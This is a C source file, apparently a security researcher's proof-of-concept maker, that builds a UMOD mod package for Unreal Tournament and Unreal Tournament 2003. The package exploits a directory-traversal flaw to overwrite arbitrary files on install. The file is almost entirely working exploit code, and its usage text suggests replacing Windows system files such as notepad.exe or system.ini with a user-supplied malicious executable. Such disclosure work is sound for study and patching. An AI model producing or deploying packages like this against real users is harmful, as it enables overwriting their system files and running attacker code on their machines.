/*

by Luigi Auriemma

UNIX & WIN VERSION
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include "umodcrc.h"

#ifdef WIN32
    #include <direct.h>
    #include <malloc.h>

    #define u_long  unsigned long
    #define u_char  unsigned char
#else
    #include <unistd.h>
    #include <sys/stat.h>
#endif




#define VER         "0.1"
#define BUFFSZ      16384
#define UMODSIGN    0x9fe3c5a3
#define MANIFEST    \
    "[Setup]\n" \
    "Product=Arbitrary file ovewriting by Luigi Auriemma\n" \
    "Version=1\n" \
    "Archive=%s\n" \
    "SrcPath=.\n" \
    "MasterPath=..\n" \
    "StartProduct=UMODPoC\n" \
    "\n" \
    "Group=SetupGroup\n" \
    "\n" \
    "[SetupGroup]\n" \
    "Copy=(Src="MANINI",Master="MANINI",Flags=3)\n" \
    "File=(Src=%s)\n"
#define MANINI      "System\\Manifest.ini"




void std_err(void);
void io_err(void);




int main(int argc, char *argv[]) {
    FILE    *fdin,
            *fdmod;
    u_char  *buff;
    u_long  offset,
            manifestsz;
    int     err;
    struct  stat    xstat;
    struct end {
        u_long  sign;
        u_long  indexstart;
        u_long  indexend;
        u_long  one;
        u_long  crc;
    } end;


    setbuf(stdout, NULL);

    fputs("\n"
        "UMOD arbitrary file overwriting proof-of-concept maker "VER"\n"
        "  Vulnerable games:\n"
        "  - Unreal Tournament      <= 451b\n"
        "  - Unreal Tournament 2003 <= 2225\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@altervista.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 4) {
        printf("\n"
            "Usage: %s <malicious_file> <\"fake_file_name\"> <file.umod/ut2mod>\n"
            "\n"
            "You must use a filename with directory traversal exploitation\n"
            "For example:\n"
            "..\\..\\..\\autoexec.bat\n"
            "..\\..\\..\\windows\\system.ini\n"
            "\n"
            "Simple usage example:\n"
            "\n"
            "%s malicious.exe \"..\\..\\..\\windows\\notepad.exe\" useme.umod\n"
            "\n", argv[0], argv[0]);
        exit(1);
    }

    printf("Opening %s\n", argv[1]);
    fdin = fopen(argv[1], "rb");
    if(!fdin) std_err();
    err = fstat(fileno(fdin), &xstat);
    if(err < 0) std_err();
    printf("Size: %lu\n\n", xstat.st_size);

    buff = malloc(BUFFSZ + 1);
    if(!buff) std_err();

    manifestsz = snprintf(
        buff,
        BUFFSZ,
        MANIFEST,
        argv[3],
        argv[2]);

    printf("Build virtual "MANINI"\n"
            "Size: %lu\n"
            "\n", manifestsz);

    printf("Creating %s\n\n", argv[3]);
    fdmod = fopen(argv[3], "wb");
    if(!fdmod) std_err();

    if(fwrite(buff, manifestsz, 1, fdmod) != 1) io_err();
    err = manifestsz;
    while(err & 0xf) {      /* useless but all the UMODs does the same */
        fputc(0x00, fdmod);
        err++;
    }

    offset = ftell(fdmod);                          // malicious file offset

    while(1) {
        err = fread(buff, 1, BUFFSZ, fdin);
        if(!err) break;
        if(fwrite(buff, err, 1, fdmod) != 1) io_err();
    }
    fclose(fdin);
    err = ftell(fdmod);
    while(err & 0xf) {      /* useless but all the UMODs does the same */
        fputc(0x00, fdmod);
        err++;
    }

    end.indexstart = err;                           // starting of index

    fputc(2, fdmod);                                // number of files

    fputc(sizeof(MANINI) - 1, fdmod);               // filename size
    fwrite(MANINI, sizeof(MANINI) - 1, 1, fdmod);   // filename
    fwrite("\x00\x00\x00\x00", 4, 1, fdmod);        // starting offset
    fwrite((void *)&manifestsz, 4, 1, fdmod);       // size of the file
    fwrite("\x03\x00\x00\x00", 4, 1, fdmod);        // flag

    err = strlen(argv[2]) + 1;
    fputc(err, fdmod);
    fwrite(argv[2], err, 1, fdmod);
    fwrite((void *)&offset, 4, 1, fdmod);
    fwrite((void *)&xstat.st_size, 4, 1, fdmod);
    fwrite("\x00\x00\x00\x00", 4, 1, fdmod);

    end.sign     = UMODSIGN;                        // umod sign
    end.indexend = ftell(fdmod) + sizeof(end);      // index ending
    end.one      = 1;                               // 1
    end.crc      = 0x00000000;                      // crc (calculated later)

    fwrite((void *)&end, sizeof(end), 1, fdmod);

        /* crc checking */
    fflush(fdmod);
    end.crc = umodcrc(argv[3], 0);
    fseek(fdmod, -4, SEEK_CUR);
    fwrite((void *)&end.crc, 4, 1, fdmod);

    fclose(fdmod);

    printf("\n"
        "Informations about %s:\n"
        "-------------------\n"
        "Index section offset: 0x%08lx\n"
        "Total package size:   %lu\n"
        "CRC:                  %08lx\n"
        "\n"
        "Files contained:\n"
        MANINI"   (used for installation)\n"
        "%s\n"
        "\n"
        "Proof-of-concept successfully created!\n",
        argv[3],
        end.indexstart,
        end.indexend,
        end.crc,
        argv[2]);

    return(0);
}




void std_err(void) {
    perror("\nError");
    exit(1);
}




void io_err(void) {
    fputs("\nError: I/O error, the file is incomplete or the disk space is finished\n", stdout);
    exit(1);
}


